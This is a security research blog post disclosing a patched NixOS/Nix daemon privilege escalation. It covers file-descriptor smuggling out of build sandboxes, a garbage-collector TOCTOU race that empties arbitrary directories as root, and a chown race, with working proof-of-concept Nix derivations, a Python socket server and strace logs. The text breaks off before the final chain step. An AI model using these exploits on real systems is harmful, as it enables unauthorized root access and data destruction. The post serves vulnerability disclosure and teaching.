NixOS: Declarative Management, Imperative Privilege Escalation - Deep Dive with Snyk Labs

These vulnerabilities have been patched by the NixOS, Lix & Guix teams, and you can make sure you’re safe by updating by referring to the respective advisory post:

In this post, we will deep-dive into discovering and exploiting this privilege escalation in stock NixOS.

If you’ve not seen my previous privilege escalation work, or any classic Linux privilege escalations, please let me introduce you to ‘unhelpfully named shell script with vague output statements’:

1$ id
2uid=1000(rory) gid=100(users) groups=100(users)
3$ sh privesc.sh
4waiting for dir creation
5delracer running
6pam server running
7waiting for file creation
8writing pam su
9waiting for nixbld1
10cleaning up
11bash: cannot set terminal process group (-1): Inappropriate ioctl for device
12bash: no job control in this shell
13
14[root@vr-nixos:/home/rory/privesc]# id
15uid=0(root) gid=0(root) groups=0(root)

What is NixOS?

NixOS is described by Wikipedia as “a Linux distribution based on a package manager named Nix. NixOS uses an immutable design and an atomic update model. Its use of a declarative programming configuration system allows reproducibility and portability.”

NixOS is a Linux distribution, like Ubuntu, Debian, or Arch Linux. The key variation, and what makes NixOS particularly interesting, is that the entire system can be configured from a single file. Gone are the days of hand editing tens of configuration files in /etc. The tightly coupled Nix package manager means you can create as many environments as you like with any combination of packages available in your $PATH. Think Python virtual environments, but for the whole system. As a researcher, this is great for experimentation, as I can bring in a selection of packages to play with, then, when I’m done, I can simply call the garbage collector, and it’s all gone.

Using NixOS on my various personal servers caused me to wonder if there were opportunities for vulnerabilities. NixOS has a very privileged daemon that contains a lot of functionality, and I’m nothing if not a lover of Linux privilege escalation.

Gadget intro: Unix domain sockets

Before we begin, it’s worth talking briefly about Unix domain sockets. They are a critical part of this privilege escalation, and are generally a very handy gadget to have in your toolkit when looking at exploiting Linux in general.

The long and the short of it is that Unix domain sockets are a type of socket available on Linux (and others) which allows communication between processes. Much like IPv4 (AF_INET) or IPv6 (AF_INET6), which you have probably seen before, Unix sockets (AF_UNIX) give you a file descriptor you can read and write to. The most common case is for system-local services, think systemd, dbus, or anything that might have an interface you’d like to interact with, to listen on a file path which you can connect to, much like you would an IP address or domain name. There is a second, lesser-used (in my experience) subtype of these sockets, known as ‘abstract’ Unix domain sockets. These sockets are used in much the same way, but the first byte of their address is null, and they are not part of the filesystem.

Such sockets, I hear you yell, are basically the same as a TCP socket, are they not? TCP sockets also are not part of the filesystem, what’s special about Unix sockets? The interesting feature of Unix sockets is SCM_RIGHTS. SCM_RIGHTS allows you to send a special ancillary message across a connected socket that contains file descriptors.

So I can have two cooperating processes, opening files and passing them between each other. Immediately, this sounds pretty boring. If I’m privileged enough to open an interesting file descriptor, why would I bother to send it somewhere else? Well, dear reader, consider what happens when you can open files as an even lower-privileged user - A sandboxed user with less access and privileges than normal. But, critically, a sandbox user whose entire sandbox is built by a higher privileged process, and is torn down by the same higher privileged process. What, then, can we do with a file descriptor that such a lower privileged process can create, but is then cleaned up once the lower privileged process exits?

Exfiltrating file descriptors from a sandbox, which assumes that the sandboxed process is the only thing with access, can result in some very exploitable behaviour.

In the following sections, we will see how the combination of exfiltrated, low-privileged file descriptors and some race condition magic can result in reliable exploitation to achieve full root command execution.

A note on prior art: This research was done without looking up previous vulnerabilities in NixOS; however, during reporting, it was identified that one of the key components of the vulnerability chain was actually already known (and previously fixed), identified as GHSA-2ffj-w4mj-pg37. Whilst we discovered this independently, I think it’s worth noting that we were not first in this area.

Failed builds, our first stepping stone

The Nix store

NixOS (and the Nix package manager in general) has a tightly controlled ‘store’, which keeps local copies of packages, artifacts, and other system files. On the NixOS system, this is analogous to /bin, /etc, /usr, and /lib combined. All files on the filesystem are symbolically linked to the Nix store or directly reference the store (for example, you won’t find /bin in your $PATH, but sh is still available). Anyone can add things to the store, but once there, they cannot be changed. Files are content-addressed; there is a hash in the top-level directory inside /nix/store, so if your input changes, your item (be it a software build, configuration file, or derivation) will end up in a different location. The Nix store is owned by root, and they’ve even gone as far as to ensure that the store is a read-only directory mount in the root namespace, so even a normal root process cannot write here:

1# id
2uid=0(root) gid=0(root) groups=0(root)
3# touch /nix/store/TEST
4touch: cannot touch '/nix/store/TEST': Read-only file system

This is great for security, and it protects against several potential attacks related to overwriting key files referenced elsewhere in the system. As noted above, however, anyone can add new content to the store:

1$ echo mycontents > myfile
2$ nix-store --add myfile
3/nix/store/izb09cpzmfmn8q5xg6pzgbcz1cpcwm5v-myfile
4$ cat /nix/store/izb09cpzmfmn8q5xg6pzgbcz1cpcwm5v-myfile
5mycontents

This piqued my interest, since the store is owned and managed by a privileged process, I wondered if there were vulnerabilities in the way files in the store were handled. I set out to explore the methods used to get files into the store. Getting static files into the store was easy, as seen above, a simple command can import files into the store. But just having static files in the store isn’t useful, as an attacker, if nobody ever references or uses them.

Nix builds

Looking at other ways files end up in the store, I came across the Nix build functionality. This allows any user (in the default configuration) to run arbitrary sandboxed software builds, where the outputs are added to the Nix store. The build files are written in the Nix declarative language. You can see in the following example that we simply create the output directory and write a file to it, which ends up in the Nix store.

1$ cat build.nix
2let
3  pkgs = import <nixpkgs> { };
4in
5pkgs.stdenv.mkDerivation {
6  name = "demo";
7  builder = "/bin/sh";
8  args = ["-c" "${pkgs.coreutils}/bin/mkdir $out && echo 'built' > $out/built"];
9  outputs = ["out"];
10  system = builtins.currentSystem;
11}
12$ nix-build build.nix
13this derivation will be built:
14  /nix/store/3y8l6r3r08zshrfx0917xsdbylli6ynj-demo.drv
15building '/nix/store/3y8l6r3r08zshrfx0917xsdbylli6ynj-demo.drv'...
16/nix/store/ydgmd2mh0grq21jfb0w2hqzfyqd9hmvp-demo
17$ ls -ld /nix/store/ydgmd2mh0grq21jfb0w2hqzfyqd9hmvp-demo
18dr-xr-xr-x 2 root root 4096 Jan  1  1970 /nix/store/ydgmd2mh0grq21jfb0w2hqzfyqd9hmvp-demo
19$ ls -l /nix/store/ydgmd2mh0grq21jfb0w2hqzfyqd9hmvp-demo
20total 4
21-r--r--r-- 1 root root 6 Jan  1  1970 built
22$ cat /nix/store/ydgmd2mh0grq21jfb0w2hqzfyqd9hmvp-demo/built
23built

There is a lot of complexity to Nix builds, and there are many, many (well-documented) options for configuring builds of any software you desire. For this post, however, we will stick with the very simple build.nix shown above.

Strange permissions

The first step towards our goal of privilege escalation came about by accident. After banging my head against the wall, finding nothing for quite a while, I took a break to look around the system to try and drum up some ideas. By pure luck, I noticed that one of the files in the nix store had a username that did not match the rest:

1$ ls -l /nix/store
2…
3-r--r--r--  2 root    root       1432 Jan  1  1970 ar2ybwglky399nhxdmhd9yaf7ha3nc8l-libraw1394-2.1.2.drv
4-r--r--r--  2 root    root       3471 Jan  1  1970 ar5rw3lmcbwfs6k4jv7c9afrwwj9775c-source.drv
5drwxr-xr-x  2 nixbld1 nixbld     4096 Apr  2 17:00 ar8g4g3ig1q76a9an09nq6xghq8prky2-demo
6-rw-------  1 root    root          0 Apr  2 17:00 ar8g4g3ig1q76a9an09nq6xghq8prky2-demo.lock
7-r--r--r--  2 root    root       1776 Jan  1  1970 ara6s1vbng0ilh9mdy80rfp04387s0gq-ansi_term-0.12.1.drv
8…

The nixbld1 user is one of the sandboxed users that the Nix daemon uses to perform the builds we looked at above. The actual build stage is executed as this user before the files are imported into the store and set to be owned by root. Digging back through my notes, I identified the cause of this different behaviour: failed builds. When a build fails, due to a non-zero exit code in the builder process, the contents of the output directory are made available in the Nix store, along with the temporary build directory, to aid in debugging build failures. Taking out our trusty strace tool, I confirmed that this is the same output directory moved from the sandbox root used by the builder. This set off alarm bells in my mind, as we can control what the nixbld1 user does while the process exists, and the fact that the output directory is moved means that we might be able to retain access even after the sandbox is cleaned up. Being able to modify things inside /nix/store is not intended, given the amount of protections it has, so this looks like a strong place to start with our exploitation.

We, of course, need to validate our idea. As alluded to above, one way we can go about this is by utilizing Unix sockets. If the nixbld1 user we control can pass a file descriptor to the output directory to a process we control, which is not inside the build sandbox, we may be able to retain write access to this directory even after it has been imported into the Nix store. Normal Nix builds are performed inside a build sandbox, which includes the network sandbox. Since there are no shared disk locations where we can use file-based Unix sockets (which, conveniently, bypass the isolation of network namespaces), we have to use abstract domain sockets, which do not rely on shared disk locations.

Nix builds offer a second, slightly less restrictive type of sandbox for use in ‘Fixed output derivations’. These build types are expected to retrieve files from the internet (for example, cloning a git repository for later building); as such, they are not isolated in a network namespace and are instead in the main network namespace, meaning that we can use abstract Unix sockets. In general, these build types require a valid hash for the downloaded content for a successful build, to ensure the reproducibility of the build as a whole. However, since we want the build to fail anyway, we don’t need to think about this requirement and can instead pass a dummy value.

Our only other requirement is appropriate code to pass a file descriptor between the sandboxed process and another process we control. This is pretty easy to do with a Python one-liner, meaning we don’t need to mess with complicated C code to do the same thing.

Testing the theory

Our test code for this step looks like this:

1let
2  pkgs = import <nixpkgs> { };
3in
4pkgs.stdenv.mkDerivation {
5  name = "demo";
6  builder = "/bin/sh";
7  args = ["-c" ''
8echo $out
9${pkgs.coreutils}/bin/mkdir $out
10${pkgs.coreutils}/bin/chmod 777 $out
11${pkgs.python3}/bin/python -c '
12import socket,os,array
13s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
14s.connect(chr(0) +"DEMO")
15s.sendmsg([b"A"], [(socket.SOL_SOCKET, socket.SCM_RIGHTS, array.array("i", [os.open(os.environ["out"], os.O_PATH)]))])
16'
17false
18''];
19  system = builtins.currentSystem;
20  outputs = ["out"];
21  outputHash = pkgs.lib.fakeHash;
22  outputHashMode = "recursive";
23}

We create the output directory (handily provided to the builder in the $out environmental variable), set it to world writable (since we’re running as nixbld1 and still beholden to Unix permission checks), and then use Python to send the O_PATH file descriptor to an abstract unix socket listening at the address ‘DEMO’. We also echo the output directory to aid with the manual validation later, since the path will contain a hash, which, while it can be calculated, is easier to just output and copy. Notice we also include definitions for outputHash and outputHashMode, which signify this build as a fixed-output build, causing the network namespace to be shared.

The corresponding Unix socket server looks like this:

1import socket, os, array
2
3s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
4s.bind(chr(0) + "DEMO")
5s.listen(1)
6c, _ = s.accept()
7data, ancdata, flags, addr = c.recvmsg(1, socket.CMSG_LEN(4))
8received_fd = int.from_bytes(ancdata[0][2], "little")
9os.fchdir(received_fd)
10os.system("/bin/sh")

This server simply receives the file descriptor sent by the builder user, changes into the directory, and runs a shell. This is a super simple way of giving interactive access to the directory for testing purposes.

Running the server and the build process at the same time results in an interactive shell inside the build output directory. Using this shell, we can create new files and confirm that we have write access to the output directory inside the Nix store after the build process has finished:

1$ nix-build build.nix
2this derivation will be built:
3  /nix/store/85hdsr24vl8cgp03wc4wpa3cwb2v245g-demo.drv
4building '/nix/store/85hdsr24vl8cgp03wc4wpa3cwb2v245g-demo.drv'...
5/nix/store/jyzg0qga1qd4w8ydszcfxzmimxm6fldx-demo
6error: builder for '/nix/store/85hdsr24vl8cgp03wc4wpa3cwb2v245g-demo.drv' failed with exit code 1;
7       last 1 log lines:
8       > /nix/store/jyzg0qga1qd4w8ydszcfxzmimxm6fldx-demo
9       For full logs, run 'nix-store -l /nix/store/85hdsr24vl8cgp03wc4wpa3cwb2v245g-demo.drv'.
10$ ls -l /nix/store/jyzg0qga1qd4w8ydszcfxzmimxm6fldx-demo
11total 0
12
13[Concurrently, in another shell]
14$ python server.py
15sh-5.2$ ls -ld .
16drwxrwxrwx 2 nixbld1 nixbld 4096 Apr  2 17:27 .
17sh-5.2$ touch EXPLOIT_SUCCESSFUL
18
19[Back in the first shell]
20$ ls -l /nix/store/jyzg0qga1qd4w8ydszcfxzmimxm6fldx-demo
21total 0
22-rw-r--r-- 1 rory users 0 Apr  2 17:28 EXPLOIT_SUCCESSFUL

What we’ve shown here is that a fixed-derivation build process, and a cooperating server outside of the build sandbox, can retain write access to a path inside the /nix/store directory, and modify it after the fact. The next step is to find an action performed by a privileged process, probably the Nix daemon, which assumes that directories inside /nix/store cannot change during processing. Given the subverted expectation that /nix/store is immutable, I thought that it was likely that there could be exploitable race conditions accessible somewhere.

Hunting impact

The ability to modify files nobody will ever look at is, frankly, useless. So begins the hunt for something we can trigger that touches the path we’ve just shown we can control. As always, strace is my tool of choice. For an intro into strace, I went into detail over what it is and how to use it effectively in the Leaky Vessels Deep Dive.

Garbage collection

The Nix store doesn’t automatically delete items it contains, but after a while, it can contain a lot of unused files, possibly from previous builds, or older versions of applications. You can therefore call the garbage collector, which will find unreferenced files and remove them. A ‘referenced’ file could be actively in use by a running environment, or referenced by a permanent environment, such as the system itself. It wouldn’t do to delete the active Linux kernel, completely breaking your install, so this package is referenced up to a garbage collection ‘root’, which will stop it from being removed. Our test builds thus far are not used by the system or any environment, so when the garbage collector is called, they will be removed. We can see this as follows:

1$ nix-build build.nix
2this derivation will be built:
3  /nix/store/3rka31dn4zp9vyzywb1l74mflxfcq17w-demo.drv
4building '/nix/store/3rka31dn4zp9vyzywb1l74mflxfcq17w-demo.drv'...
5/nix/store/jyzg0qga1qd4w8ydszcfxzmimxm6fldx-demo
6error: builder for '/nix/store/3rka31dn4zp9vyzywb1l74mflxfcq17w-demo.drv' failed with exit code 1;
7       last 1 log lines:
8       > /nix/store/jyzg0qga1qd4w8ydszcfxzmimxm6fldx-demo
9       For full logs, run 'nix-store -l /nix/store/3rka31dn4zp9vyzywb1l74mflxfcq17w-demo.drv'.
10$ nix-collect-garbage
11finding garbage collector roots...
12deleting garbage...
13deleting '/nix/store/jyzg0qga1qd4w8ydszcfxzmimxm6fldx-demo'
14deleting '/nix/store/jyzg0qga1qd4w8ydszcfxzmimxm6fldx-demo.lock'
15deleting '/nix/store/3rka31dn4zp9vyzywb1l74mflxfcq17w-demo.drv'
16deleting unused links...
17note: currently hard linking saves 38.53 MiB
183 store paths deleted, 0.00 MiB freed

Examining the behavior

Observe that the directory we created (/nix/store/jyz…-demo) is deleted, along with a couple of other related files (the lockfile, still present because of the build failure, and the .drv, which is a serialized format of the build.nix). We know from above that we could be in control of the /nix/store/jyz…-demo directory as it is being deleted. Creating a test directory structure under our output directory inside the build (with mkdir $out/a/b and touch $out/a/b/c) and re-running the garbage collection with the daemon under strace yields the following:

1$ strace -p $(pidof nix-daemon) -f -s 262144 -yy
2…
3newfstatat(15</nix/store>, "[hash]-demo", {st_mode=S_IFDIR|0755, st_size=4096, ...}, AT_SYMLINK_NOFOLLOW) = 0
4openat(15</nix/store>, "/nix/store/[hash]-demo", O_RDONLY) = 16</nix/store/[hash]-demo>
5fstat(16</nix/store/[hash]-demo>, {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
6getdents64(16</nix/store/[hash]-demo>, 0x55fca913cca0 /* 3 entries */, 32768) = 72
7newfstatat(16</nix/store/[hash]-demo>, "a", {st_mode=S_IFDIR|0755, st_size=4096, ...}, AT_SYMLINK_NOFOLLOW) = 0
8openat(16</nix/store/[hash]-demo>, "/nix/store/[hash]-demo/a", O_RDONLY) = 17</nix/store/[hash]-demo/a>
9fstat(17</nix/store/[hash]-demo/a>, {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
10getdents64(17</nix/store/[hash]-demo/a>, 0x55fca9144ce0 /* 3 entries */, 32768) = 72
11newfstatat(17</nix/store/[hash]-demo/a>, "b", {st_mode=S_IFDIR|0755, st_size=4096, ...}, AT_SYMLINK_NOFOLLOW) = 0
12openat(17</nix/store/[hash]-demo/a>, "/nix/store/[hash]-demo/a/b", O_RDONLY) = 18</nix/store/[hash]-demo/a/b>
13fstat(18</nix/store/[hash]-demo/a/b>, {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
14getdents64(18</nix/store/[hash]-demo/a/b>, 0x55fca914cd20 /* 3 entries */, 32768) = 72
15newfstatat(18</nix/store/[hash]-demo/a/b>, "c", {st_mode=S_IFREG|0644, st_size=0, ...}, AT_SYMLINK_NOFOLLOW) = 0
16unlinkat(18</nix/store/[hash]-demo/a/b>, "c", 0) = 0

This output is pretty dense, but we can read from it that it recursively enters the directories flagged for deletion, iterating over the files (listed with the getdents64 syscall), checking their type (with the newfstatat call), and either recursing into the directory or unlinking if it’s a file. Technically, reading syscalls directly like this takes a lot of assumptions; We don’t know that it’s checking their type using the output with newfstatat, but given the context, and the way this kind of code is usually written, we can make an educated guess. A quick look at the source code confirms this reading, from nix/src/libutil/file-system.cc:_deletePath:

1static void _deletePath(Descriptor parentfd, const fs::path & path, uint64_t & bytesFreed)
2{
3[...]
4    std::string name(baseNameOf(path.native()));
5
6    struct stat st;
7    if (fstatat(parentfd, name.c_str(), &st,
8            AT_SYMLINK_NOFOLLOW) == -1) {
9[...]
10    }
11
12[...]
13
14    if (S_ISDIR(st.st_mode)) {
15[...]
16
17        int fd = openat(parentfd, path.c_str(), O_RDONLY);
18[...]
19        AutoCloseDir dir(fdopendir(fd));
20[...]
21
22        struct dirent * dirent;
23        while (errno = 0, dirent = readdir(dir.get())) { /* sic */
24            checkInterrupt();
25            std::string childName = dirent->d_name;
26            if (childName == "." || childName == "..") continue;
27            _deletePath(dirfd(dir.get()), path + "/" + childName, bytesFreed);
28        }
29[...]
30    }
31
32[...]
33    if (unlinkat(parentfd, name.c_str(), flags) == -1) {
34[...]
35    }
36[...]
37}

The vulnerability we’re looking for is already present in the strace output. Have you spotted it? The code seems to be pretty safe; it uses the *at family of calls to open paths by name relative to a directory, and it’s almost perfect. The *at family of calls can make exploitation impossible, since if you’re holding file descriptors and checking against the file descriptors themselves, things can’t change under you. There is just one error: the openat calls use a full path as their second argument. They pass a file descriptor for the first argument, though, shouldn’t this be ok?

From the openat(2) manpage:

If pathname is absolute, then dirfd is ignored.

Absolute paths?

So the openat calls ignore the passed directory file descriptor. Let's look closely at just one section of the strace output to see how we can exploit this:

First, our directory ‘b’ is examined to see its type

14119502 newfstatat(17</nix/store/[hash]-demo/a>, "b", {st_mode=S_IFDIR|0755, st_size=4096, ...}, AT_SYMLINK_NOFOLLOW) = 0

Next, we open the directory so we have a directory file handle (18) we can use later

14119502 openat(17</nix/store/[hash]-demo/a>, "/nix/store/[hash]-demo/a/b", O_RDONLY) = 18</nix/store/[hash]-demo/a/b>

Double-check that the file descriptor hasn’t changed under us, and is still a directory

14119502 fstat(18</nix/store/[hash]-demo/a/b>, {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

Finally, iterate over the directory and delete its contents. In this case, a file called ‘c’

14119502 getdents64(18</nix/store/[hash]-demo/a/b>, 0x55fca914cd20 /* 3 entries */, 32768) = 72
24119502 newfstatat(18</nix/store/[hash]-demo/a/b>, "c", {st_mode=S_IFREG|0644, st_size=0, ...}, AT_SYMLINK_NOFOLLOW) = 0
34119502 unlinkat(18</nix/store/[hash]-demo/a/b>, "c", 0) = 0

Consider what would happen if the directory ‘a’ changes while this process is running. Even though the process has already checked the directory ‘a’ (omitted here, but it’s done the same way as the directory ‘b’) and is reusing the same file handle that it’s already checked with fstat, the absolute path passed to openat throws all that away and opens a path that could have changed since it was checked. This is a classic Time Of Check, Time Of Use (or TOCTOU) vulnerability.

Crafting a proof of concept

To test for and later exploit this vulnerability, we need to set up a crafted output directory. There are a few criteria we must meet to write our proof of concept:

We need to be able to modify the directory structure while the garbage collector is running
We need a nested directory structure such that we can replace a directory with a symbolic link higher up in the path, while lower components are being processed
We need to know the specific timing of when we should perform the replacement, and we need enough time to do so reliably
We need something safe to target while we test

For item 1, we have our vulnerability from above. We can create the output directory and make it world writable, then pass a file descriptor to another process we control to make modifications at the correct time. Item 2 is relatively simple to create as well; we can simply create the directory structure $out/a/b containing some files, which will be deleted. At the appropriate time, the directory ‘a’ can be replaced with another, causing the openat calls to be redirected via symbolic links we control. The directory structure can also aid us with item 3. By filling the nested directory with a large number of files, which will take some time to process, we can watch this directory for the deletion of any files, and when this occurs, we can know that the processing is taking place, and that we’re inside the race condition window. At this point, there should also be enough files remaining that we have the time to swap out the directory ‘a’ with a different directory we control. Finally, for a directory we control, we can create a new directory somewhere and fill it with sample files, which we will hopefully see deleted.

Putting this all together, we end up with a proof of concept build file and service like the following:

1let
2  pkgs = import <nixpkgs> { };
3in
4pkgs.stdenv.mkDerivation {
5  name = "test00006";
6  builder = "/bin/bash";
7  args = ["-c" ''
8echo $out
9TARGET=/tmp/deleteme
10${pkgs.coreutils}/bin/mkdir -p $out/a/b/a{0000..1000}
11${pkgs.coreutils}/bin/mkdir -p $out/z.new/b/
12
13for i in {0000..1000}; do
14        ${pkgs.coreutils}/bin/ln -s $TARGET $out/z.new/b/a$i
15done
16
17${pkgs.coreutils}/bin/chmod 777 $out
18${pkgs.python3}/bin/python -c 'import socket,os,array;s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM); s.connect(chr(0) +"DEMO");s.sendmsg([b"A"], [(socket.SOL_SOCKET, socket.SCM_RIGHTS, array.array("i", [os.open(os.environ["out"], os.O_PATH)]))])'
19false
20''];
21  system = builtins.currentSystem;
22  outputHash = pkgs.lib.fakeHash;
23  outputHashMode = "recursive";
24}

And

1import socket, os, array
2
3s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
4s.bind(chr(0) + "DEMO")
5s.listen(1)
6c, _ = s.accept()
7data, ancdata, flags, addr = c.recvmsg(1, socket.CMSG_LEN(4))
8received_fd = int.from_bytes(ancdata[0][2], "little")
9os.fchdir(received_fd)
10
11while os.path.exists("a/b/a0000"):
12    ...
13os.rename("a", "a.old")
14os.rename("z.new", "a")

We create 1000 directories, $out/a/b/a0000 to $out/a/b/a1000, these will be the directories that are hopefully (getdents64 isn’t ordered reliably) processed first. The large number of directories lets us watch for one specific deletion, and replace the directory $out/a while the rest of the directories are being deleted. We also create the directory $out/z.new/b, named as such to sort lexographically after $out/a, so hopefully processed later (or not at all if our exploit is successful). We then fill our ‘new’ directory with 1000 symbolic links, matching the names of our first set of directories. When the Nix daemon performs the open, expecting the directory it has already validated, as we saw above:

14119502 openat(17</nix/store/[hash]-demo/a>, "/nix/store/[hash]-demo/a/b", O_RDONLY) = 18</nix/store/[hash]-demo/a/b>

The Python server will wait for a connection, receive the file descriptor for the output directory, watch for the file $out/a/b/a0000 to be deleted, indicating it is inside the race condition window, and then swap the a and z.new directories.

The hope is that we have been able to replace the directory ‘a’ with a new directory we control, such that the directory ‘b’ being opened is a symbolic link to another directory we wish to target. The process would be thus:

nix-daemon progresses through its recursive deletion until it looks in $out/a/b
It will start deleting the directories a0000, a0001, etc. It will recurse inside each directory, scan for nested files to delete (finding none in the directory structure), then delete the directory a0000, etc.
At some point during this process, $out/a is moved out of the way and replaced with $out/z.new. Directories at the absolute path ending $out/a/b/a0500 (etc) are now symbolic links to our target directory (/tmp/deleteme in our proof of concept)
The nix-daemon will not notice this change, as it is still checking files relative to the old $out/a
When the nix-daemon performs the openat call, it will traverse our a0500 symbolic link, opening an arbitrary directory and recursing inside
The nix-daemon will happily empty the directory we have pointed it at, deleting files as root.

Running our proof of concept, we can see the following output:

1$ ls -l /tmp/deleteme
2total 0
3-rw-r--r-- 1 rory users 0 Apr  3 09:27 a
4-rw-r--r-- 1 rory users 0 Apr  3 09:27 b
5-rw-r--r-- 1 rory users 0 Apr  3 09:27 c
6-rw-r--r-- 1 rory users 0 Apr  3 09:27 d
7$ nix-build build.nix
8[...]
9$ nix-collect-garbage
10finding garbage collector roots...
11deleting garbage...
12deleting '/nix/store/blfpgvrazzjkf2kqzz5h47255s0cdq7g-test00006.drv'
13deleting '/nix/store/zqhjzr26ic71nzlzgsi28s6gwgzwg0rd-test00006.lock'
14deleting '/nix/store/zqhjzr26ic71nzlzgsi28s6gwgzwg0rd-test00006'
150 store paths deleted, 0.00 MiB freed
16error: cannot unlink '"/nix/store/zqhjzr26ic71nzlzgsi28s6gwgzwg0rd-test00006/a"': Directory not empty
17$ ls -l /tmp/deleteme
18total 0

We can see nix-collect-garbage errors with ‘Directory not empty’, this is because we changed the directory as it was processing, so the symbolic links for directories it’s already been deleted are still there. This exploitation is slightly unreliable, but it can be cleanly retried, and in the final proof of concept, we simply loop on the exploitation until our target files are deleted.

Looking in our target directory /tmp/deleteme, we can now see that the files we had put in place are no longer there, showing successful exploitation.

Arbitrary directory emptying

Arbitrary file deletion is one of my least favourite vulnerabilities, it is quite often hard to turn into something actually interesting. In this case what we have actually found is even worse, as we can only empty a directory but we cannot delete the directory itself, making this a very blunt instrument.

You can rest assured, dear reader, that there is a way to turn this vulnerability into something fun; otherwise, this blog post would not exist.

Finding a target

Our options are quite limited for targeting such a vulnerability. We don’t want to break the system entirely, as root command execution is meaningless if you’ve wiped out everything of value. This excludes most system files like /etc, /dev, /lib, etc. The natural answer is /tmp, or equivalent. The sticky bit on /tmp means we can’t interfere with files and directories that we didn’t create; however, if they’re deleted using our exploit, we can recreate them, since /tmp is world writable.

Turning once again to strace, examining a build (with some extra flags turned on, we’ll see that soon), we find a few potentially interesting leads in the sandbox creation code:

1newfstatat(AT_FDCWD</>, "/tmp", {st_mode=S_IFDIR|S_ISVTX|0777, st_size=4096, ...}, AT_SYMLINK_NOFOLLOW) = 0
2mkdir("/tmp/nix-build-demo.drv-0", 0700) = 0
3mkdir("/tmp/nix-build-demo.drv-0/build", 0700) = 0
4chown("/tmp/nix-build-demo.drv-0/build", 30001, 30000) = 0
5openat(AT_FDCWD</>, "/tmp/nix-build-demo.drv-0/build/.attr-[hash]-demo", O_WRONLY|O_CREAT|O_TRUNC|O_CLOEXEC, 0666) = 19</tmp/nix-build-demo.drv-0/build/.attr-[hash]-demo>
6write(19</tmp/nix-build-demo.drv-0/build/.attr-[hash]-demo>, "test", 4) = 4
7close(19</tmp/nix-build-demo.drv-0/build/.attr-[hash]-demo>) = 0
8chown("/tmp/nix-build-demo.drv-0/build/.attr-[hash]-demo", 30001, 30000) = 0
9newfstatat(AT_FDCWD</>, "/tmp/nix-build-demo.drv-0/build", {st_mode=S_IFDIR|0700, st_size=4096, ...}, AT_SYMLINK_NOFOLLOW) = 0
10mount("/tmp/nix-build-demo.drv-0/build", "/nix/store/[hash]-demo.drv.chroot/root/build", 0x7fc183a87e5e, MS_BIND|MS_REC, NULL) = 0

The /tmp/nix-build-demo.drv-0 directory is used as the current working directory during a build, and can be left behind in the case of a failed build to assist with debugging. As such, it’s created in an accessible location: under /tmp. UID 30001 is the UID for the nixbld1 user, which we will later have code execution as inside the build sandbox, with the build directory acting as the current working directory.

The .attr-[hash]-demo file comes from some new functionality we added to our build.nix:

1  my_env = "test";
2  passAsFile = ["my_env"];

Arguments in the build.nix which aren’t otherwise keywords will be passed to the build process as environmental variables. When the passAsFile keyword specifies some of these environmental variables by name, they are instead passed as files into the sandbox. This is particularly useful when you want to pass data to the process that will not fit inside an environmental variable due to operating system size restrictions.

There are 3 vulnerabilities here (test yourself!), of which only one is practically exploitable (all were reported and fixed anyway). Whilst /tmp/nix-build-demo.drv-0 is root-owned, with permissions 0700, meaning we cannot normally interfere with it, we are assuming that we have used our previous exploit to delete everything inside /tmp, and we can therefore recreate any directory structures we see ourselves.

The first vulnerability is the first chown of /tmp/nix-build-demo.drv-0/build. Whilst chown will follow symbolic links, and the build directory is not directly inside /tmp so the sticky bit does not take effect, this syscall happens immediately after the mkdir for this directory, meaning there isn’t enough time to delete the directory using our (relatively slow) exploit above and recreate it by the time the chown happens. (If the nix-build-demo.drv-0 directory exists before we get to this code, the daemon will use nix-build-demo.drv-1 (etc) instead).

The third vulnerability, also not exploitable, is the call to mount on the last line. mount will follow symbolic links in its source (the first) argument. This could potentially have allowed us to mount arbitrary directories inside the build sandbox. This could have been interesting as it may have allowed us to gain more write access over /nix/store than is normally possible. However, once again, the window is too narrow. It would be necessary to replace the source directory between the immediately preceding call to newfstatat and the mount, which is too tight of a window. If the call to newfstatat sees that the source path is a symbolic link, it will recreate the symbolic link inside the sandbox rather than calling mount, making the exploit fail.

The second vulnerability is our winner. The chown of the file /tmp/nix-build-demo.drv-0/build/.attr-[hash]-demo to UID 30001 (nixbld1). While this call happens almost immediately after the call to openat, which creates the file, the write in between is crucial, as we control the content that gets written. In this case it’s just the string ‘test’, but if we write enough content (say, 100MB) to this file, it should give us plenty of time to replace the file with a symbolic link while the write happens, such that by the time the process gets to the call to chown the chown will affect some other file we’ve targeted.

A look at timing

Looking at the timing for just this section, passing a 100MB string as a parameter (to be written to the file) with

1  passAsFile = ["passme"];
2  passme = pkgs.lib.concatMapStrings (_: "A") (pkgs.lib.range 1 100000000);

We get

110:39:10.197451 mkdir("/tmp/nix-build-test00005.drv-0", 0700) = 0
210:39:10.197553 mkdir("/tmp/nix-build-test00005.drv-0/build", 0700) = 0
310:39:10.197617 chown("/tmp/nix-build-test00005.drv-0/build", 30001, 30000) = 0
410:39:10.202695 mmap(NULL, 100003840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fc15e0a1000
510:39:34.911220 openat(AT_FDCWD</>, "/tmp/nix-build-test00005.drv-0/build/.attr-[hash]", O_WRONLY|O_CREAT|O_TRUNC|O_CLOEXEC, 0666) = 5014</tmp/nix-build-tes
610:39:34.911418 write(5014</tmp/nix-build-test00005.drv-0/build/.attr-[hash]>, "AAA…”, 100000000) = 100000000
710:39:34.944649 close(5014</tmp/nix-build-test00005.drv-0/build/.attr-[hash]>) = 0
810:39:34.944790 munmap(0x7fc15e0a1000, 100003840) = 0
910:39:34.947171 chown("/tmp/nix-build-test00005.drv-0/build/.attr-[hash]", 30001, 30000) = 0

We can see that the directory is created in /tmp, followed by a large mmap to hold the large variable data. Between the mmap and the openat, there is a 24-second window. This window is perfect for us to use our previous exploit to empty /tmp. We can then recreate /tmp/nix-build-test00005.drv-0/build before the call to openat. Once we control the build directory, we can watch it for the creation of the .attr-... file, and use the 0.036-second window between the call to openat and the call to chown to replace the file (as it’s being written to) with a symbolic link.

